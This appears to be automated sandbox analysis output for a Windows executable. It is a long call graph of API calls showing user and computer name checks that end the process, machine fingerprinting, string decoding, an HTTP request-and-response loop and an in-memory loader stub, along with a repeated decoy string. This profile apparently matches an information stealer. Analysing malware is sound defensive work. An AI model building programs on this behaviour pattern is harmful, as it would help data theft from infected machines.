4045c0 34 API calls 27066->27067 27068 403d5c 27067->27068 27069 4045c0 34 API calls 27068->27069 27070 403d75 27069->27070 27071 4045c0 34 API calls 27070->27071 27072 403d8e 27071->27072 27073 4045c0 34 API calls 27072->27073 27074 403da7 27073->27074 27075 4045c0 34 API calls 27074->27075 27076 403dc0 27075->27076 27077 4045c0 34 API calls 27076->27077 27078 403dd9 27077->27078 27079 4045c0 34 API calls 27078->27079 27080 403df2 27079->27080 27081 4045c0 34 API calls 27080->27081 27082 403e0b 27081->27082 27083 4045c0 34 API calls 27082->27083 27084 403e24 27083->27084 27085 4045c0 34 API calls 27084->27085 27086 403e3d 27085->27086 27087 4045c0 34 API calls 27086->27087 27088 403e56 27087->27088 27089 4045c0 34 API calls 27088->27089 27090 403e6f 27089->27090 27091 4045c0 34 API calls 27090->27091 27092 403e88 27091->27092 27093 4045c0 34 API calls 27092->27093 27094 403ea1 27093->27094 27095 4045c0 34 API calls 27094->27095 27096 403eba 27095->27096 27097 4045c0 34 API calls 27096->27097 27098 403ed3 27097->27098 27099 4045c0 34 API calls 27098->27099 27100 403eec 27099->27100 27101 4045c0 34 API calls 27100->27101 27102 403f05 27101->27102 27103 4045c0 34 API calls 27102->27103 27104 403f1e 27103->27104 27105 4045c0 34 API calls 27104->27105 27106 403f37 27105->27106 27107 4045c0 34 API calls 27106->27107 27108 403f50 27107->27108 27109 4045c0 34 API calls 27108->27109 27110 403f69 27109->27110 27111 4045c0 34 API calls 27110->27111 27112 403f82 27111->27112 27113 4045c0 34 API calls 27112->27113 27114 403f9b 27113->27114 27115 4045c0 34 API calls 27114->27115 27116 403fb4 27115->27116 27117 4045c0 34 API calls 27116->27117 27118 403fcd 27117->27118 27119 4045c0 34 API calls 27118->27119 27120 403fe6 27119->27120 27121 4045c0 34 API calls 27120->27121 27122 403fff 27121->27122 27123 4045c0 34 API calls 27122->27123 27124 404018 27123->27124 27125 4045c0 34 API calls 27124->27125 27126 404031 27125->27126 27127 4045c0 34 API calls 27126->27127 27128 40404a 
27127->27128 27129 4045c0 34 API calls 27128->27129 27130 404063 27129->27130 27131 4045c0 34 API calls 27130->27131 27132 40407c 27131->27132 27133 4045c0 34 API calls 27132->27133 27134 404095 27133->27134 27135 4045c0 34 API calls 27134->27135 27136 4040ae 27135->27136 27137 4045c0 34 API calls 27136->27137 27138 4040c7 27137->27138 27139 4045c0 34 API calls 27138->27139 27140 4040e0 27139->27140 27141 4045c0 34 API calls 27140->27141 27142 4040f9 27141->27142 27143 4045c0 34 API calls 27142->27143 27144 404112 27143->27144 27145 4045c0 34 API calls 27144->27145 27146 40412b 27145->27146 27147 4045c0 34 API calls 27146->27147 27148 404144 27147->27148 27149 4045c0 34 API calls 27148->27149 27150 40415d 27149->27150 27151 4045c0 34 API calls 27150->27151 27152 404176 27151->27152 27153 4045c0 34 API calls 27152->27153 27154 40418f 27153->27154 27155 4045c0 34 API calls 27154->27155 27156 4041a8 27155->27156 27157 4045c0 34 API calls 27156->27157 27158 4041c1 27157->27158 27159 4045c0 34 API calls 27158->27159 27160 4041da 27159->27160 27161 4045c0 34 API calls 27160->27161 27162 4041f3 27161->27162 27163 4045c0 34 API calls 27162->27163 27164 40420c 27163->27164 27165 4045c0 34 API calls 27164->27165 27166 404225 27165->27166 27167 4045c0 34 API calls 27166->27167 27168 40423e 27167->27168 27169 4045c0 34 API calls 27168->27169 27170 404257 27169->27170 27171 4045c0 34 API calls 27170->27171 27172 404270 27171->27172 27173 4045c0 34 API calls 27172->27173 27174 404289 27173->27174 27175 4045c0 34 API calls 27174->27175 27176 4042a2 27175->27176 27177 4045c0 34 API calls 27176->27177 27178 4042bb 27177->27178 27179 4045c0 34 API calls 27178->27179 27180 4042d4 27179->27180 27181 4045c0 34 API calls 27180->27181 27182 4042ed 27181->27182 27183 4045c0 34 API calls 27182->27183 27184 404306 27183->27184 27185 4045c0 34 API calls 27184->27185 27186 40431f 27185->27186 27187 4045c0 34 API calls 27186->27187 27188 404338 27187->27188 27189 4045c0 34 API calls 
27188->27189 27190 404351 27189->27190 27191 4045c0 34 API calls 27190->27191 27192 40436a 27191->27192 27193 4045c0 34 API calls 27192->27193 27194 404383 27193->27194 27195 4045c0 34 API calls 27194->27195 27196 40439c 27195->27196 27197 4045c0 34 API calls 27196->27197 27198 4043b5 27197->27198 27199 4045c0 34 API calls 27198->27199 27200 4043ce 27199->27200 27201 4045c0 34 API calls 27200->27201 27202 4043e7 27201->27202 27203 4045c0 34 API calls 27202->27203 27204 404400 27203->27204 27205 4045c0 34 API calls 27204->27205 27206 404419 27205->27206 27207 4045c0 34 API calls 27206->27207 27208 404432 27207->27208 27209 4045c0 34 API calls 27208->27209 27210 40444b 27209->27210 27211 4045c0 34 API calls 27210->27211 27212 404464 27211->27212 27213 4045c0 34 API calls 27212->27213 27214 40447d 27213->27214 27215 4045c0 34 API calls 27214->27215 27216 404496 27215->27216 27217 4045c0 34 API calls 27216->27217 27218 4044af 27217->27218 27219 4045c0 34 API calls 27218->27219 27220 4044c8 27219->27220 27221 4045c0 34 API calls 27220->27221 27222 4044e1 27221->27222 27223 4045c0 34 API calls 27222->27223 27224 4044fa 27223->27224 27225 4045c0 34 API calls 27224->27225 27226 404513 27225->27226 27227 4045c0 34 API calls 27226->27227 27228 40452c 27227->27228 27229 4045c0 34 API calls 27228->27229 27230 404545 27229->27230 27231 4045c0 34 API calls 27230->27231 27232 40455e 27231->27232 27233 4045c0 34 API calls 27232->27233 27234 404577 27233->27234 27235 4045c0 34 API calls 27234->27235 27236 404590 27235->27236 27237 4045c0 34 API calls 27236->27237 27238 4045a9 27237->27238 27239 419c10 27238->27239 27240 419c20 43 API calls 27239->27240 27241 41a036 8 API calls 27239->27241 27240->27241 27242 41a146 27241->27242 27243 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27241->27243 27244 41a153 8 API calls 27242->27244 27245 41a216 27242->27245 27243->27242 27244->27245 27246 41a298 27245->27246 27247 41a21f GetProcAddress 
GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27245->27247 27248 41a2a5 6 API calls 27246->27248 27249 41a337 27246->27249 27247->27246 27248->27249 27250 41a344 9 API calls 27249->27250 27251 41a41f 27249->27251 27250->27251 27252 41a4a2 27251->27252 27253 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27251->27253 27254 41a4ab GetProcAddress GetProcAddress 27252->27254 27255 41a4dc 27252->27255 27253->27252 27254->27255 27256 41a515 27255->27256 27257 41a4e5 GetProcAddress GetProcAddress 27255->27257 27258 41a612 27256->27258 27259 41a522 10 API calls 27256->27259 27257->27256 27260 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27258->27260 27261 41a67d 27258->27261 27259->27258 27260->27261 27262 41a686 GetProcAddress 27261->27262 27263 41a69e 27261->27263 27262->27263 27264 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27263->27264 27265 415ca3 27263->27265 27264->27265 27266 401590 27265->27266 27541 401670 27266->27541 27269 41a7a0 lstrcpy 27270 4015b5 27269->27270 27271 41a7a0 lstrcpy 27270->27271 27272 4015c7 27271->27272 27273 41a7a0 lstrcpy 27272->27273 27274 4015d9 27273->27274 27275 41a7a0 lstrcpy 27274->27275 27276 401663 27275->27276 27277 415510 27276->27277 27278 415521 27277->27278 27279 41a820 2 API calls 27278->27279 27280 41552e 27279->27280 27281 41a820 2 API calls 27280->27281 27282 41553b 27281->27282 27283 41a820 2 API calls 27282->27283 27284 415548 27283->27284 27285 41a740 lstrcpy 27284->27285 27286 415555 27285->27286 27287 41a740 lstrcpy 27286->27287 27288 415562 27287->27288 27289 41a740 lstrcpy 27288->27289 27290 41556f 27289->27290 27291 41a740 lstrcpy 27290->27291 27330 41557c 27291->27330 27292 415643 StrCmpCA 27292->27330 27293 4156a0 StrCmpCA 27294 4157dc 27293->27294 27293->27330 27295 41a8a0 lstrcpy 27294->27295 27297 4157e8 27295->27297 27296 401590 lstrcpy 27296->27330 27299 41a820 2 API calls 27297->27299 27298 41a820 lstrlenA lstrcpy 
27298->27330 27300 4157f6 27299->27300 27304 41a820 2 API calls 27300->27304 27301 415856 StrCmpCA 27302 415991 27301->27302 27301->27330 27305 41a8a0 lstrcpy 27302->27305 27303 41a7a0 lstrcpy 27303->27330 27306 415805 27304->27306 27307 41599d 27305->27307 27308 401670 lstrcpy 27306->27308 27310 41a820 2 API calls 27307->27310 27328 415811 27308->27328 27309 41a740 lstrcpy 27309->27330 27312 4159ab 27310->27312 27311 415a0b StrCmpCA 27313 415a16 Sleep 27311->27313 27314 415a28 27311->27314 27315 41a820 2 API calls 27312->27315 27313->27330 27316 41a8a0 lstrcpy 27314->27316 27317 4159ba 27315->27317 27319 415a34 27316->27319 27318 401670 lstrcpy 27317->27318 27318->27328 27320 41a820 2 API calls 27319->27320 27321 415a43 27320->27321 27323 41a820 2 API calls 27321->27323 27322 4152c0 29 API calls 27322->27330 27324 415a52 27323->27324 27326 401670 lstrcpy 27324->27326 27325 41578a StrCmpCA 27325->27330 27326->27328 27327 41593f StrCmpCA 27327->27330 27328->26385 27329 4151f0 23 API calls 27329->27330 27330->27292 27330->27293 27330->27296 27330->27298 27330->27301 27330->27303 27330->27309 27330->27311 27330->27322 27330->27325 27330->27327 27330->27329 27331 41a8a0 lstrcpy 27330->27331 27331->27330 27333 417553 GetVolumeInformationA 27332->27333 27334 41754c 27332->27334 27335 417591 27333->27335 27334->27333 27336 4175fc GetProcessHeap HeapAlloc 27335->27336 27337 417619 27336->27337 27338 417628 wsprintfA 27336->27338 27339 41a740 lstrcpy 27337->27339 27340 41a740 lstrcpy 27338->27340 27341 415da7 27339->27341 27340->27341 27341->26406 27343 41a7a0 lstrcpy 27342->27343 27344 404899 27343->27344 27550 4047b0 27344->27550 27346 4048a5 27347 41a740 lstrcpy 27346->27347 27348 4048d7 27347->27348 27349 41a740 lstrcpy 27348->27349 27350 4048e4 27349->27350 27351 41a740 lstrcpy 27350->27351 27352 4048f1 27351->27352 27353 41a740 lstrcpy 27352->27353 27354 4048fe 27353->27354 27355 41a740 lstrcpy 27354->27355 27356 40490b InternetOpenA StrCmpCA 27355->27356 27357 404944 
27356->27357 27358 404955 27357->27358 27359 404ecb InternetCloseHandle 27357->27359 27563 418b60 GetSystemTime lstrcpy lstrcpy 27358->27563 27361 404ee8 27359->27361 27558 409ac0 CryptStringToBinaryA 27361->27558 27362 404963 27564 41a920 lstrcpy lstrcpy lstrcatA 27362->27564 27365 404976 27367 41a8a0 lstrcpy 27365->27367 27372 40497f 27367->27372 27368 41a820 2 API calls 27369 404f05 27368->27369 27371 41a9b0 4 API calls 27369->27371 27370 404f27 codecvt 27374 41a7a0 lstrcpy 27370->27374 27373 404f1b 27371->27373 27376 41a9b0 4 API calls 27372->27376 27375 41a8a0 lstrcpy 27373->27375 27387 404f57 27374->27387 27375->27370 27377 4049a9 27376->27377 27378 41a8a0 lstrcpy 27377->27378 27379 4049b2 27378->27379 27380 41a9b0 4 API calls 27379->27380 27381 4049d1 27380->27381 27382 41a8a0 lstrcpy 27381->27382 27383 4049da 27382->27383 27565 41a920 lstrcpy lstrcpy lstrcatA 27383->27565 27385 4049f8 27386 41a8a0 lstrcpy 27385->27386 27388 404a01 27386->27388 27387->26409 27389 41a9b0 4 API calls 27388->27389 27390 404a20 27389->27390 27391 41a8a0 lstrcpy 27390->27391 27392 404a29 27391->27392 27393 41a9b0 4 API calls 27392->27393 27394 404a48 27393->27394 27395 41a8a0 lstrcpy 27394->27395 27396 404a51 27395->27396 27397 41a9b0 4 API calls 27396->27397 27398 404a7d 27397->27398 27566 41a920 lstrcpy lstrcpy lstrcatA 27398->27566 27400 404a84 27401 41a8a0 lstrcpy 27400->27401 27402 404a8d 27401->27402 27403 404aa3 InternetConnectA 27402->27403 27403->27359 27404 404ad3 HttpOpenRequestA 27403->27404 27406 404b28 27404->27406 27407 404ebe InternetCloseHandle 27404->27407 27408 41a9b0 4 API calls 27406->27408 27407->27359 27409 404b3c 27408->27409 27410 41a8a0 lstrcpy 27409->27410 27411 404b45 27410->27411 27567 41a920 lstrcpy lstrcpy lstrcatA 27411->27567 27413 404b63 27414 41a8a0 lstrcpy 27413->27414 27415 404b6c 27414->27415 27416 41a9b0 4 API calls 27415->27416 27417 404b8b 27416->27417 27418 41a8a0 lstrcpy 27417->27418 27419 404b94 27418->27419 27420 41a9b0 4 API calls 
27419->27420 27421 404bb5 27420->27421 27422 41a8a0 lstrcpy 27421->27422 27423 404bbe 27422->27423 27424 41a9b0 4 API calls 27423->27424 27425 404bde 27424->27425 27426 41a8a0 lstrcpy 27425->27426 27427 404be7 27426->27427 27428 41a9b0 4 API calls 27427->27428 27429 404c06 27428->27429 27430 41a8a0 lstrcpy 27429->27430 27431 404c0f 27430->27431 27568 41a920 lstrcpy lstrcpy lstrcatA 27431->27568 27433 404c2d 27434 41a8a0 lstrcpy 27433->27434 27435 404c36 27434->27435 27436 41a9b0 4 API calls 27435->27436 27437 404c55 27436->27437 27438 41a8a0 lstrcpy 27437->27438 27439 404c5e 27438->27439 27440 41a9b0 4 API calls 27439->27440 27441 404c7d 27440->27441 27442 41a8a0 lstrcpy 27441->27442 27443 404c86 27442->27443 27569 41a920 lstrcpy lstrcpy lstrcatA 27443->27569 27445 404ca4 27446 41a8a0 lstrcpy 27445->27446 27447 404cad 27446->27447 27448 41a9b0 4 API calls 27447->27448 27449 404ccc 27448->27449 27450 41a8a0 lstrcpy 27449->27450 27451 404cd5 27450->27451 27452 41a9b0 4 API calls 27451->27452 27453 404cf6 27452->27453 27454 41a8a0 lstrcpy 27453->27454 27455 404cff 27454->27455 27456 41a9b0 4 API calls 27455->27456 27457 404d1f 27456->27457 27458 41a8a0 lstrcpy 27457->27458 27459 404d28 27458->27459 27460 41a9b0 4 API calls 27459->27460 27461 404d47 27460->27461 27462 41a8a0 lstrcpy 27461->27462 27463 404d50 27462->27463 27570 41a920 lstrcpy lstrcpy lstrcatA 27463->27570 27465 404d6e 27466 41a8a0 lstrcpy 27465->27466 27467 404d77 27466->27467 27468 41a740 lstrcpy 27467->27468 27469 404d92 27468->27469 27571 41a920 lstrcpy lstrcpy lstrcatA 27469->27571 27471 404db3 27572 41a920 lstrcpy lstrcpy lstrcatA 27471->27572 27473 404dba 27474 41a8a0 lstrcpy 27473->27474 27475 404dc6 27474->27475 27476 404de7 lstrlenA 27475->27476 27477 404dfa 27476->27477 27478 404e03 lstrlenA 27477->27478 27573 41aad0 27478->27573 27480 404e13 HttpSendRequestA 27481 404e32 InternetReadFile 27480->27481 27482 404e67 InternetCloseHandle 27481->27482 27487 404e5e 27481->27487 27484 41a800 
27482->27484 27484->27407 27485 41a9b0 4 API calls 27485->27487 27486 41a8a0 lstrcpy 27486->27487 27487->27481 27487->27482 27487->27485 27487->27486 27578 41aad0 27488->27578 27490 4117c4 StrCmpCA 27491 4117d7 27490->27491 27492 4117cf ExitProcess 27490->27492 27493 4117e7 strtok_s 27491->27493 27496 4117f4 27493->27496 27494 4119c2 27494->26411 27495 41199e strtok_s 27495->27496 27496->27494 27496->27495 27497 4118ad StrCmpCA 27496->27497 27498 4118cf StrCmpCA 27496->27498 27499 4118f1 StrCmpCA 27496->27499 27500 411951 StrCmpCA 27496->27500 27501 411970 StrCmpCA 27496->27501 27502 411913 StrCmpCA 27496->27502 27503 411932 StrCmpCA 27496->27503 27504 41185d StrCmpCA 27496->27504 27505 41187f StrCmpCA 27496->27505 27506 41a820 2 API calls 27496->27506 27507 41a820 lstrlenA lstrcpy 27496->27507 27497->27496 27498->27496 27499->27496 27500->27496 27501->27496 27502->27496 27503->27496 27504->27496 27505->27496 27506->27495 27507->27496 27508->26417 27509->26419 27510->26425 27511->26427 27512->26433 27513->26435 27514->26439 27515->26443 27516->26447 27517->26453 27518->26455 27519->26459 27520->26473 27521->26477 27522->26476 27523->26472 27524->26476 27525->26494 27526->26479 27527->26483 27528->26484 27529->26490 27530->26491 27531->26497 27532->26504 27533->26506 27534->26530 27535->26533 27536->26534 27537->26529 27538->26534 27539->26543 27542 41a7a0 lstrcpy 27541->27542 27543 401683 27542->27543 27544 41a7a0 lstrcpy 27543->27544 27545 401695 27544->27545 27546 41a7a0 lstrcpy 27545->27546 27547 4016a7 27546->27547 27548 41a7a0 lstrcpy 27547->27548 27549 4015a3 27548->27549 27549->27269 27574 401030 27550->27574 27554 404838 lstrlenA 27577 41aad0 27554->27577 27556 404848 InternetCrackUrlA 27557 404867 27556->27557 27557->27346 27559 409af9 LocalAlloc 27558->27559 27560 404eee 27558->27560 27559->27560 27561 409b14 CryptStringToBinaryA 27559->27561 27560->27368 27560->27370 27561->27560 27562 409b39 LocalFree 27561->27562 27562->27560 27563->27362 27564->27365 
27565->27385 27566->27400 27567->27413 27568->27433 27569->27445 27570->27465 27571->27471 27572->27473 27573->27480 27575 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27574->27575 27576 41aad0 27575->27576 27576->27554 27577->27556 27578->27490 27716 416ab1 902 API calls 27679 4069f3 7 API calls 27579 b00005 27584 b0092b GetPEB 27579->27584 27581 b00030 27585 b0003c 27581->27585 27584->27581 27586 b00049 27585->27586 27600 b00e0f SetErrorMode SetErrorMode 27586->27600 27591 b00265 27592 b002ce VirtualProtect 27591->27592 27594 b0030b 27592->27594 27593 b00439 VirtualFree 27598 b005f4 LoadLibraryA 27593->27598 27599 b004be 27593->27599 27594->27593 27595 b004e3 LoadLibraryA 27595->27599 27597 b008c7 27598->27597 27599->27595 27599->27598 27601 b00223 27600->27601 27602 b00d90 27601->27602 27603 b00dad 27602->27603 27604 b00dbb GetPEB 27603->27604 27605 b00238 VirtualAlloc 27603->27605 27604->27605 27605->27591 27680 b1d106 41 API calls __amsg_exit 27718 b16a0a ExitProcess 27719 41cafe 219 API calls 4 library calls 27720 b1cd97 170 API calls 2 library calls 27721 b1be78 162 API calls 2 library calls 26150 401190 26157 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26150->26157 26152 40119e 26153 4011cc 26152->26153 26159 417850 GetProcessHeap HeapAlloc GetUserNameA 26152->26159 26155 4011b7 26155->26153 26156 4011c4 ExitProcess 26155->26156 26158 417939 26157->26158 26158->26152 26160 4178c3 26159->26160 26160->26155 27654 b13823 StrCmpCA StrCmpCA StrCmpCA StrCmpCA strtok_s 27684 b0fd67 152 API calls 27722 41ce9f 69 API calls __amsg_exit 27655 b13823 6 API calls 27656 b1140b strtok_s 27657 4088a4 RaiseException task __CxxThrowException@8 27658 4180a5 GetProcessHeap HeapFree 27659 b16c57 692 API calls 27660 b1102b StrCmpCA strtok_s lstrlen lstrcpy 27687 b16d18 646 API calls 27689 41b9b0 RtlUnwind 27724 b16a40 6 API calls 27725 b13b7d 91 API calls 2 library calls

Control-flow Graph

APIs
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
• GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
• RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
• strlen.MSVCRT ref: 004046F0
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
• lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
• VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C

Strings
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
